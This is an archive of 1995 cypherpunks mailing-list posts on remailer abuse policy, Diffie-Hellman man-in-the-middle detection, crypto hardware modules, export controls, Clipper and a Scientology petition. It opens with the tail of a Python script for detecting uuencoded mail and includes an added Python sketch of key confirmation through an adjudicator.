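72 720 moveto (User's Manual) show
end
showpage
"""

UU_MAIL = ("Subject: code from the list\n\n"
           + make_uuencoded("sample.c", SOURCE) + "\n")

PLAIN_SOURCE_MAIL = "Subject: same code, not encoded\n\n" + SOURCE.decode()

if __name__ == "__main__":
    for label, mail in [("postscript", POSTSCRIPT_MAIL),
                        ("uuencoded", UU_MAIL),
                        ("plain source", PLAIN_SOURCE_MAIL)]:
        print(f"{label:13} naive={naive_flag(mail)!s:5} "
              f"structural={find_uuencoded_files(mail)}")
```

The third sample is the case raised in the post: the same source sent without uuencoding triggers neither rule, so encoding detection says nothing about what the content is.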






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hkhenson@cup.portal.com
Date: Wed, 1 Feb 95 01:27:27 PST
To: cypherpunks@toad.com
Subject: Surety (authentication)
Message-ID: <9502010126.2.19816@cup.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to all of you who replied to my request.  I have what I 
needed.  Keith




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Tue, 31 Jan 95 23:04:04 PST
To: LRH-L <alt.religion.scientology@newnews.demon.co.uk>
Subject: Scientology Petition v2.1
Message-ID: <Pine.SUN.3.91.950201015036.10698A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain



     Church of Scientology
     PETITION Version 2.1
 
     I have undertaken on my own determinism to rewrite the petition
according to criticisms that I have received.  This version below is
short and sweet.  Since I have no authority whatsoever from those who
wrote the original petition to do this, this is certainly not official.
However if enough like it, perhaps we can talk the original petition
writers into considering it.   I will be posting this to
 
     news.admin.misc,alt.current-events.net-abuse,alt.privacy.anon-servers
     alt.censorship, alt.cyberpunks, and comp.org.eff.talk
 
     If you think it is worthwhile, please post it to other groups
as well.

     Homer


     We the undersigned deplore

     1.) The Church of Scientology's recent apparent (unproven)
efforts to rmgroup alt.religion.scientology.

     2.) The Church of Scientology's recent apparent (unproven)
efforts to cancel non copyrighted postings.

     3.) The Church of Scientology's overt and apparently covert plans
to spam both alt.religion.scientology and the rest of usenet with
'success stories' and testimonials, in order to drown out the
'graffiti' and negative testimony and commentary.

     4.) The Church of Scientology's legal efforts to shut off anonymous
remailers to alt.religion.scientology and alt.clearing.technology, and
their legal threats against the remailer operators for postings,
copyrighted or not, coming through them. 

     5.) The Church of Scientology's legal efforts to clamp down on
ANY copyrighted postings or quotations at all, even when clearly Fair
Use.

     6.) Any open or covert declaration by Church of Scientology
Officials against anyone on the internet declaring them to be a
Suppressive Person, and any open or covert declaration of anyone on
the internet as Fair Game whether or not it is to be called that.

     We the undersigned eschew any efforts on the part of anyone to
render alt.religion.scientology a moderated group.

     We the undersigned implore the Church of Scientology

     1.) To work closely with the Electronic Freedom Frontier to solve
what it perceives to be its problems with the internet, and to
endeavor to join the internet community as a respected citizen in the
forums of two way communication with anyone at any time on any
subject.

     2.) To help formulate guidelines for, and accept fair use
excerption of the works of L.  Ron Hubbard for the purpose of non
commercial criticism and educational commentary.

     Homer Wilson Smith
     United Free Zone Alliance




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 1 Feb 95 00:45:08 PST
To: cypherpunks@toad.com
Subject: Minnesota Cypherpunks Get Together and Bull Session
Message-ID: <LKqBlKjqRWXF078yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Well folks, I've been on the list over a year and haven't seen a get
together for those of us in MN. So being the masochist that I am, I'm going
to try to put one together. Granted it won't be nearly as elaborate as those
in the Bay area, but it'll be a start.

Tentatively:

Date: Saturday March 4, 1995

Place: Applebees - Calhoun Village Shopping Center, Minneapolis

Time: 5:00pm 'til they throw us out.


This may change, depending on how many (or how few) respond. Let me know if
you are interested or have suggestions. This also will be a good
opportunity for some key signing too.


Sam

--
==============================================================================
skaplin@skypoint.com                   | Finger skaplin@infinity.c2.org for
                                       | a listing of crypto related files
PGP encrypted mail is accepted and     | available on my auto-responder.
preferred.                             | (Yes...the faqs are there!)
                                       |
Finger skaplin@mirage.skypoint.com for | "...vidi vici veni" - Overheard
PGP public key.                        | outside a Roman brothel.
                                       |
Fax Number  +1 (612) 928-9771          | An UZI beats five aces every time...
==============================================================================
                Architecture is the art of how to waste space.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Tue, 31 Jan 95 23:45:14 PST
To: cypherpunks@toad.com (Cypherpunks)
Subject: ESM
Message-ID: <199502010744.CAA09337@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just want to know where I can get a copy of ESM to test on some Linux and 
Solaris boxes ...

Please reply directly, thanx

- -----
Doc					      doc@phobos.lib.iup.edu
aka Mark Rogaski			      http://www.lib.iup.edu/~rogaski/

Disclaimer:  You would probably be hard-pressed to find ANYONE who agrees
             	with me, much less my university or employer...

   [finger fllevta@oak.grove.iup.edu for PGP Public Key and Geek Code v2.1]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLy877B0c4/pqJauBAQH4HwP+MCfRBEebhvIGxmlCIAUwEjACbYOlkdmd
5NL7+8zZ7wsXOS5/HxUIxtzM55WysA21SMWh0F2e9sabMqwfqM0j0WxdDJWmA5gg
oaJlttwHmNpneDcbNBKjKGBivWM2Byibk/1R7usqKjPwYL1qCN1ORvr87G6fNqxX
txpt8mts+bo=
=cF94
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Tue, 31 Jan 95 23:49:33 PST
To: Eric Hughes <eric@remailer.net>
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <199502010527.VAA04897@largo.remailer.net>
Message-ID: <Pine.SUN.3.91.950201020755.4492A-100000@reggae.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 31 Jan 1995, Eric Hughes wrote:

> Just because plain old Diffie Hellman is subject to active attack
> doesn't mean it's useless.  Some protection is better than no
> protection at all.  It's still worthwhile implementing some security
> to make an opponent's task harder than to implement no security.

I'm curious though if there is some way to reduce the risk or at least 
increase the detectability of active DH spoofing.   I am thinking of the 
use of a trusted adjudicator who could receive information from both the 
original participants and check to see if the two keys matched.

Does anyone see a good solution to this problem?

-Thomas
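
Added example, not part of the original message or of ESM: a sketch of the adjudicator idea raised above, in which each endpoint derives a key-confirmation value from its own Diffie-Hellman result and a third party compares the two. It assumes the reports reach the adjudicator over a channel the attacker cannot alter; the modulus is toy-sized and every name here is hypothetical.

```python
import hashlib
import secrets

# Toy parameters for illustration only: 2**127 - 1 is a Mersenne prime,
# far too small for real use.
P = 2**127 - 1
G = 3


class Party:
    """One endpoint of an unauthenticated Diffie-Hellman exchange."""

    def __init__(self, name: str):
        self.name = name
        self._x = secrets.randbelow(P - 3) + 2      # private exponent
        self.public = pow(G, self._x, P)
        self._secret = None

    def receive(self, peer_public: int) -> None:
        # Whatever arrived on the wire is taken as the peer's value.
        self._secret = pow(peer_public, self._x, P)

    def _derive(self, label: bytes) -> bytes:
        raw = self._secret.to_bytes(16, "big")
        return hashlib.sha256(label + raw).digest()

    def session_key(self) -> bytes:
        return self._derive(b"session-key")

    def confirmation(self) -> str:
        # Separate label, so the value given to the adjudicator is not the
        # key that encrypts the session.
        return self._derive(b"key-confirmation").hex()


def honest_network(sender_public: int) -> int:
    """Delivers public values unchanged."""
    return sender_public


class ActiveAttacker:
    """Model of the active attack: every public value in transit is
    replaced with the attacker's own."""

    def __init__(self):
        self._m = secrets.randbelow(P - 3) + 2
        self.public = pow(G, self._m, P)

    def __call__(self, sender_public: int) -> int:
        return self.public


def run_exchange(network):
    alice, bob = Party("alice"), Party("bob")
    bob.receive(network(alice.public))
    alice.receive(network(bob.public))
    return alice, bob


def adjudicate(report_a: str, report_b: str) -> bool:
    """Trusted third party: True when both endpoints hold the same key."""
    return secrets.compare_digest(report_a, report_b)


def spoofing_detected(network) -> bool:
    alice, bob = run_exchange(network)
    return not adjudicate(alice.confirmation(), bob.confirmation())


if __name__ == "__main__":
    print("honest path flagged:  ", spoofing_detected(honest_network))
    print("attacked path flagged:", spoofing_detected(ActiveAttacker()))
```

The comparison only detects the substitution; if the attacker can also rewrite the reports sent to the adjudicator, the check can be made to pass, which is why the out-of-band channel is stated as an assumption.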






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Homer Wilson Smith <homer@math.cornell.edu>
Date: Wed, 1 Feb 95 04:23:52 PST
To: Remailer Operators List <Remailer-Operators@c2.org>
Subject: A proposal....
In-Reply-To: <199502011144.AA03317@xs1.xs4all.nl>
Message-ID: <Pine.SUN.3.91.950201064928.14234A-100000@math>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 1 Feb 1995, Remailer Operator wrote:

> I'll not block addresses based on information supplied here. You forget
> that there is no -formal- system, just a loose collection of operators.
> There is no single policy, that operators use. 

     Certainly, each operator is responsible for his own site and must
act or not act as he sees fit, accepting the full consequences of those
decisions.  That is as it should be.

     No one is DEMANDING that anyone block an address, except the
complainer's of course. :)

     However there is no harm in global reporting of spams or abuse,
as each operator can choose to act or not act on the data as he will.

> >     Perhaps there could be a blocking mailing list, and all remailers
> > could advertise that list in their headers, and anyone who wants to
> > be blocked can send mail to that list and we would all get it.
> 
> Perhaps. But I think it is a matter between the operator of a specific
> site and the to be blocked address, not something for the world to know.

     Well in general I would guess that complainers WANT all reops to know
about the complaint, they only complain to the one they got the abuse
from, but they figure the abuser will just go to the next remailer and
start there.  They would prefer a way to contact all reops immediately to
stop this sort of thing from happening.

     Complainers are often so mad at the abuse that they not only
write the remailer operator but also his sysadmin.  Rahul for example
has gotten at least two things 'on his desk' in the last two days,
because of stuff going through my remailer, and that's two too many
for me.  That doesn't include all the ones he's gotten that he didn't
forward to me because it was already handled.
 
     Further various and sundry turkeys are going to be complaining
both to ME and possibly to Rahul for the next month about the
Valentine's spam, as late readers come up to it in their news.  I am
STILL getting complaints and the guy was hung out to dry 10 hours ago.

     The complainer almost always wants ALL remail to that address
stopped, and he certainly doesn't want to have to send repeated
messages to various remailers as the abuser keeps jumping around.
That would infuriate me no end if I were a postmaster.

     I would suggest that those of us who are interested, provide such
a common list for complainers, it would make them feel one hell of a
lot better about remailers, and keep the borderline cases on the side
of free speech.  A lot of people would like to see remailers shut
down, but for many of them it's mainly because remailers make them feel
hysterical when things go out of control.  

     THEY DON'T KNOW WHERE TO GO TO BRING THINGS BACK INTO CONTROL,
AND THEY ARE NOT SURE THEY WILL BE PAID ATTENTION TO.  This leads to
cc's to sysadmins and things, which I for one find INTOLERABLE.
 
     If we can bring a sense of immediate (even if partial) response
and control to the remailer network, then this hysteria may subside a
bit.

     I would distinguish between two kinds of abuse.
 
     Individual abuse, and spams.
 
     On the individual abuse I would agree that personal data should
probably be kept confidential.  Certainly one does not give away
the complainee to the complainer so of course one does not post
the complainee's name here or elsewhere.  I have taken to posting
the letters that I write them however, to show newbies possible
ways of dealing with these things.
 
     However I see nothing wrong with posting the complainer's name.  Some
complainers might object, but I think they understand the need to widely
distribute, at least to the reops, their address so that we can all
effectively block them IF WE CHOOSE. 

     In any case, such individual abuse is usually from one person to
another, and it's easy to block the TO: line without revealing the From:
line, so there is no need to post the complainee's name. 
 
     In the case of spams, it's different.  Spammers usually spam from one
address (forged or not), but post to many sites. Blocking the To: line is
impossible, but the From: line is easy. 
 
     In this case I am for posting the From: line, not only here but as
far and wide as possible.  If I am wrong, I am sure you will let me know. 
 
     I propose a mailing list, public or not, which those of you who wish
to can subscribe, and which we advertise in the headers of all outgoing
mail, saying that complaints should be sent to the mailing list.  That way
we all get to see spammers and complainers at once, making for much more
effective action. 

     This reduces the wear and tear on the postmasters, who surely do not
deserve the brunt of the abuse.  Like the Credit Card reporting agencies,
one call is all it takes to report all your cards gone, one mail is all it
takes to inform all operators of a spam or abuse. 
 
     I am not suggesting that all reops join this list, or act on the
data posted to it if they do, or advertise the list in their headers.  I 
propose that THOSE OF US WHO WANT TO DO THIS, do it.
 
     Sort of a loose coalition or alliance amongst reops to show
solidarity and personal responsibility towards the net.

     I KNOW people would appreciate it.

     How say any of you?
 
     Homer
 
P.S.  groupname@bull.com went down after the Valentine spam.
 
     Not very nice.  I have already gotten warm mail commending US
on how fast we nuked the guy.
 
    I say have no mercy for spammers.

    Homer






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Hughes <hughes@CSUA.Berkeley.EDU>
Date: Wed, 1 Feb 95 08:36:15 PST
To: cypherpunks@toad.com
Subject: Mystery files in the incoming/ directory
Message-ID: <199502011636.IAA15941@soda.CSUA.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I'm doing some archive maintenance at long last.  Be warned, you can't
upload right now because of some mystery configuration error that I
can't fix myself.

What I'm asking about are some files that were not uploaded with
descriptions.  I'll delete them in a week or so if I haven't got mail
indicating what they are.  This list is at the bottom of this message.
(Yes, some of them are quite old.)

Note that the archive maintainers have their own address now (see
header).  Please use it for all archive maintenance mail.  And please
read README.UPLOAD if you're going to upload in the future.

Eric
-----------------------------------------------------------------------------
-rw-rw-r--  1 hughes   remailer   119940 May 16  1994 contrib.zip
-rw-rw-r--  1 hughes   remailer    16360 Jun 23  1994 cpremailer.tar.gz
-rw-rw-r--  1 hughes   remailer    68968 Dec 16 09:07 dc-irc.alpha.tar.gz
-rw-rw-r--  1 hughes   remailer    14946 Dec  1 15:29 mkpgp.txt.uu.gz
-rw-rw-r--  1 hughes   remailer    75424 May 16  1994 pgp10.zip
-rw-rw-r--  1 hughes   remailer   233854 Jul 16  1994 pgpw26.zip
-rw-rw-r--  1 hughes   remailer    58033 May  7  1994 pwf11.zip
-rw-rw-r--  1 hughes   remailer     2913 Dec  1 15:27 signtools.tgz




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 1 Feb 95 08:54:28 PST
To: cypherpunks@toad.com
Subject: Re: The security characteristics of crypto modules with secrets
In-Reply-To: <199502011528.KAA23229@crypto.com>
Message-ID: <199502011653.IAA05730@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   The advantage of a secure crypto module on an insecure server (or
   router or whatever) is in limiting the scope of successful attack. 

Just to expand on this, the scope is limited in _time_, not space.
That is, when you pull out the module (literally or figuratively), the
attack is known to be over -- and don't plug it back into a machine of
unknown state.

   The main important
   difference between this attack and just learning the server's secret
   is that it only remains useful as long as the attack is undiscovered.

Yes.  Typically, once the attack is discovered, the method used in the
attack is also discovered.  The particular hole is then patched.  The
system can now be put back online without fear of immediate
re-compromise.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 1 Feb 95 08:58:07 PST
To: cypherpunks@toad.com
Subject: Re: ESP Unix encrypted session protocol software
In-Reply-To: <Pine.SUN.3.91.950201020755.4492A-100000@reggae.src.umd.edu>
Message-ID: <199502011656.IAA05742@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Thomas Grant Edwards <tedwards@src.umd.edu>

   I am thinking of the 
   use of a trusted adjudicator who could receive information from both the 
   original participants and check to see if the two keys matched.

How do you authenticate the adjudicator?

You'll have to communicate with the adjudicator and verify one of
their signatures.  You can just as easily exchange signed DH
parameters directly with the other party and verify the signature of
your correspondent.

This is another one of those problems where potential solutions often
just lead to infinite regress.

Eric






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 1 Feb 95 06:18:28 PST
To: cypherpunks@toad.com
Subject: Re: VoicePGP cracked in 10 minutes?...
In-Reply-To: <199502010348.VAA00506@einstein.ssz.com>
Message-ID: <9502011418.AA26570@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain




root says:
> I heard a rumor here in Ctl. Tx. that the VoicePGP project was cracked in the
> last couple of days in approx. 10 minutes. Anyone have any info on this other
> than one of those wild rumors that occur?

Considering that VoicePGP hasn't even been released, this is
fascinating news. Perhaps the same team could work next on cracking
things that haven't even been invented yet.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 1 Feb 95 06:35:42 PST
To: cypherpunks@toad.com
Subject: Re: How the cypherpunks nearly got me fired (long)
In-Reply-To: <v03001102ab54e8d6db82@[140.174.229.210]>
Message-ID: <9502011435.AA26645@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Sattler says:
> At 22:10 1/31/95, David Mandl wrote:
> 
> [really horrid story about true life at a corporate dinosaur deleted]
> 
> >I just thought
> >you might enjoy this little story, and would want to keep it in mind if
> >you're ever considering employment at Bear-Stearns.
> 
> Part of my job-interviewing procedure has become grilling a would-be
> employer (or whoever is asking for a contractor) about their net
> connections.

I'm a consultant. However, I won't take on clients with sufficiently
distasteful business practices. This is something I consider to be
sufficiently distasteful.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 1 Feb 95 01:18:54 PST
To: cypherpunks@toad.com
Subject: Re: CD-ROM [brief addition]
Message-ID: <9502010918.AA00196@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


> 	I forgot to mention that the CD-ROM in development will be
> export restricted. It isn't going to be sold outside the united states
> and canada.


:-(




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Wed, 1 Feb 95 07:27:03 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: The security characteristics of crypto modules with secrets
In-Reply-To: <Pine.3.89.9501312316.A19818-0100000@netcom4>
Message-ID: <199502011528.KAA23229@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain


>> The prevalent use of modules further reduces the likelihood of initial
>> attacks based on spoofing.  Since active IP attacks require the
>> subversion of routers, and since router software is much more
>> difficult to subvert than general purpose servers, adding crypto
>> modules to routers would be a big win.
>
>This does not make sense:  The advantage of a tamper resistant module
>is that if somebody physically gets to the system, he still cannot
>get the key.  But if he physically gets to the router, he can
>make it do his will, even if he does not get the key.  So one
>might as well have the key in software in the router.
>
>If the router is hard to subvert, and the attacker cannot 
>physically get to it, then there is little need for a separate
>tamper resistant module.  Software will do fine.
>
>If the router can be got at, you are stuffed regardless, tamper
>resistant module or not.

The advantage of a secure crypto module on an insecure server (or
router or whatever) is in limiting the scope of successful attack. 
As Eric pointed out, if you can subvert a general purpose machine that
does all its crypto through a secure module that you can't subvert,
you can still add a covert "service" to the machine that lets
a future spoofer use the module remotely.  The main important
difference between this attack and just learning the server's secret
is that it only remains useful as long as the attack is undiscovered.
In the case of software keys, it is sufficient for the attacker to subvert
the machine that knows the secret ONCE.  He or she can put things back
to normal on the original machine and still know the secret forever, with
little chance of future detection.  With a secure module, the attacker has
to either steal (physically) the hardware (which will be discovered when
the real server stops working) or set up the kind of future access that
Eric mentioned (which, once discovered, will likely be turned off or
investigated).

If you have secure crypto hardware, you only have to worry about and
detect whether the server is being compromised continuously.  Otherwise,
without special hardware, you have to worry about and detect whether the
server was ever compromised since it was last rekeyed.  Personally,
the former seems like a realistic thing to try to do while the latter
doesn't, at least in the environments in which I live.

If the server hardware or software is insecure, cryptographic techniques
can't provide any absolute guarantees, period.   In the real world, though,
you're not interested in absolute guarantees, you just want to
reduce risks.   How effective the mechanisms to do this are depends on
how accurately they reflect the real world threats.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ssteele@eff.org (Shari Steele)
Date: Wed, 1 Feb 95 07:38:08 PST
To: merriman@metronet.com
Subject: your membership renewal letter
Message-ID: <199502011537.KAA27134@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


February 1, 1995

Dear David,

We received your response to our membership renewal reminder and would like
to thank you for taking the time to actually write a letter explaining why
you have chosen not to renew.  We are sorry that you are unhappy with the
role EFF played in the Digital Telephony negotiations.  We were not totally
comfortable with our role, but we do believe we did the right thing and that
there would be a much more intrusive bill if EFF had done nothing.

However, I'm sure that you've heard the arguments by now, and I'm not
writing to change your mind about our role in Digital Telephony but,
instead, to let you know about a lawsuit we're about to file against the
State Department and others claiming the ITAR listing of encryption as a
munition is unconstitutional.  Our plaintiff wanted to post an encryption
algorithm he developed to sci.crypt.  The State Department informed him
that he would need an export license before he could post the algorithm on
the Net and then told him that he would be denied the license because the
algorithm was too strong.  We see this as a critical First Amendment
challenge to a regulation that undermines secure communications on the
networks.  The suit should be filed before the end of the month.

We don't expect to please all of the people all of the time, and it is
clear that we didn't please you with Digital Telephony.  But we really are
trying to make Cyberspace a better place to be, and we hope you'll
reconsider your decision regarding your renewal.  You can earmark your
contribution to be applied only to litigation or some other particular
function, if that would make you feel more comfortable.

Take care.

Sincerely,
Shari

----------------------------------------------------------------------------
Shari Steele, Director of Legal Services                ssteele@eff.org
Electronic Frontier Foundation                 202/861-7700 (voice)
1667 K Street, N.W., Suite 801                    202/861-1258 (fax)
Washington, DC  20006-1605                    202/861-1224 (BBS)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jltocher@CCGATE.HAC.COM
Date: Wed, 1 Feb 95 11:31:47 PST
To: Cypherpunks@toad.com
Subject: Clipper Revived?
Message-ID: <9501017916.AA791667001@CCGATE.HAC.COM>
MIME-Version: 1.0
Content-Type: text/plain


     From Edupage:
     
     REPLACEMENT FOR CLIPPER
     AT&T and VLSI Technology Inc. will collaborate to develop microchips 
     that use a triple-strength version of DES (data encryption standard), 
     which previously had been rejected by the National Security Agency. 
     VLSI is the designated contractor to make the government-favored 
     Clipper chips, but this latest announcement reveals their doubts over 
     whether there's a market for the Clipper. "These companies have 
     basically made the determination that Clipper is dead and there's 
     going to be the proliferation of encryption anyway, so they might as 
     well take advantage of it," says one observer, who predicts the market 
     for such technology "could reach hundreds of millions" of dollars in 
     annual sales by the end of the decade. (Wall Street Journal 1/31/95 
     A3)
     
John L. Tocher                THE CITY-a bounded infinity.   A labyrinth where
JLTocher@Earthlink.net        you are never lost. Your private map where every
PGP:  CE 72 1A 11 07 47 35    block bears exactly the same number. Even if you
35 9A C1 DE EA 64 21 BC 94    lose your way, you cannot go wrong.   --Kobo Abe







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Wed, 1 Feb 95 09:43:00 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: "bad" government
Message-ID: <m0rZj0d-000E8pC@dorite.use.com>
MIME-Version: 1.0
Content-Type: text/plain



>> If strong government resulted in liberty and freedom, then the
>> most intrusive, all-encompassing governments would result in 
>> its citizens having the most liberty.  Is this the case?  I would
>> look at the (former) Soviet Union, Iran, Cuba, East Germany, etc., 
>> for your answer.

>Unrestricted individual freedom leads to unrestricted freedom of 
>`private' corporations.  Private corporations uncurbed by society's law are 
>autarkies: internally totalitarian, externally predatory, as amoral as 
>amoebas.
>
>Is this the shape of the future you seek?
  
'Tis better to err on the side of liberty.
 
To suggest otherwise would indicate that the origin and true meaning of 
"rights" or "liberty" is not understood.  
 
You can NOT restrict someone's rights simply because they MIGHT harm another 
(prior restraint).  If they do cause actual harm to someone, they should be 
brought to justice.  To place restrictions on someone based on the 
possibility that they may cause harm introduces restrictions based solely on 
the authorities' opinions (political philosophy, religion, race, etc).
 
Is that the shape of the future YOU seek?
************************************************************
*           Just your basic signature block                *
*                                                          *
*  Al Thompson                                             *
*  Fidonet 1:231/110                                       *
*  alt@iquest.net                                          *
************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 1 Feb 95 09:53:27 PST
To: root@einstein.ssz.com (root)
Subject: Re: VoicePGP cracked in 10 minutes?...
In-Reply-To: <199502010348.VAA00506@einstein.ssz.com>
Message-ID: <199502011753.MAA21825@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Hi all,
> 
> I heard a rumor here in Ctl. Tx. that the VoicePGP project was cracked in the
> last couple of days in approx. 10 minutes. Anyone have any info on this other
> than one of those wild rumors that occur?
> 
> Thanks and take care.
> 
Nope. That was "Call Security" which used something called Quick Public
Key (QPK?) that was apparently homemade.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Wed, 1 Feb 95 09:58:08 PST
To: cypherpunks@toad.com
Subject: What's with anon.penet.fi??
Message-ID: <199502011757.MAA21864@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject says it. Every message I post to the list gets a reply saying
that I am abusing the remailer by posting chain letters etc.

All replies to admin@anon.penet.fi are also getting bounced back too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Wed, 1 Feb 95 13:03:39 PST
To: Thomas Grant Edwards <eric@remailer.net>
Subject: Re: ESP Unix encrypted session protocol software
Message-ID: <ab559e8c000210040b91@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 11:49 PM 1/31/95, Thomas Grant Edwards wrote:
>On Tue, 31 Jan 1995, Eric Hughes wrote:
>
>> Just because plain old Diffie Hellman is subject to active attack
>> doesn't mean it's useless.  Some protection is better than no
>> protection at all.  It's still worthwhile implementing some security
>> to make an opponent's task harder than to implement no security.
>
>I'm curious though if there is some way to reduce the risk or at least
>increase the detectability of active DH spoofing.   I am thinking of the
>use of a trusted adjudicator who could receive information from both the
>original participants and check to see if the two keys matched.
>
>Does anyone see a good solution to this problem?
....
I trust that the attack referred to is the "man-in-the-middle". I find
it very curious that there is a simple fix to the attack for the encrypted
voice channel. Each unit displays to its human a few bits of g^(xy). One
human quotes them vocally to the other. If there is a man in the middle the
bits are unlikely to match. What I find curious is that there seems to be
no automated analog to this precaution. It has to do with the difficulty of
substituting the vocal signals that code these bits. This is too hard for
either computer or man (in the middle). I write to stimulate a solution. I
have none.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Lowenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Wed, 1 Feb 95 11:28:22 PST
To: Anthony Ortenzi <ortenzi@interactive.net>
Subject: Re: Fundamental Question?
Message-ID: <9502011924.AA02931@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Although I understand the need for remailers for anonymity, is it
>  not true that the whole idea of encryption (good encryption, that
>  is) is that no matter who gets the encrypted text, it really doesn't
>  matter?  Does this not mean that something like USENET is *perfect*
>  for this?

Usenet may provide good untraceability for the recipient, but if the  
sender desires untraceability she needs to use a remailer or some other  
service to get the message into Usenet.  Also, the recipient needs to know if  
and where to look for the message.  If the recipient isn't anticipating the  
receipt of a message untraceably, or doesn't care if 'they' know she is  
receiving the message, then Usenet isn't necessary.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Wed, 1 Feb 95 05:18:47 PST
To: cypherpunks@toad.com
Subject: Re: CD-ROM [brief addition]
Message-ID: <199502011233.AA16433@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


In article <199502010224.SAA24809@infinity.c2.org> sameer stated:

: 	I forgot to mention that the CD-ROM in development will be
: export restricted. It isn't going to be sold outside the united states
: and canada.

Why not produce it outside the US and import it ?

Regards,
--
Alex de Joode					    
usura@replay.com	                               Hate mail appreciated,
http://www.xs4all.nl/~usura             weekly contest for best death threat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Ortenzi <ortenzi@interactive.net>
Date: Wed, 1 Feb 95 10:54:36 PST
To: cypherpunks@toad.com
Subject: Fundamental Question?
Message-ID: <Pine.BSI.3.91.950201135326.29214A-100000@ns.interactive.net>
MIME-Version: 1.0
Content-Type: text/plain


Although I understand the need for remailers for anonymity, is it not 
true that the whole idea of encryption (good encryption, that is) is that 
no matter who gets the encrypted text, it really doesn't matter?  Does 
this not mean that something like USENET is *perfect* for this?

				-Anthony







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 1 Feb 95 11:12:48 PST
To: ortenzi@interactive.net (Anthony Ortenzi)
Subject: Re: Fundamental Question?
In-Reply-To: <Pine.BSI.3.91.950201135326.29214A-100000@ns.interactive.net>
Message-ID: <199502011911.OAA09754@bwnmr5.bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| Although I understand the need for remailers for anonymity, is it not 
| true that the whole idea of encryption (good encryption, that is) is that 
| no matter who gets the encrypted text, it really doesn't matter?  Does 
| this not mean that something like USENET is *perfect* for this?

	It's awfully expensive to send messages all over creation so
one person can read them.  Much better to send it to the person who
wants to read it.  Besides, USENET propagation can be slower than
remailers; the far ends of the chain can often take around a week.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 1 Feb 95 05:56:14 PST
To: cypherpunks@toad.com
Subject: PGP Question
Message-ID: <9502011343.AA00578@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Is there any simple way to glue a binary file and its detached pgp
signature together into a single pgp file (as produced by non-detached
signing) ?

thanks
Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
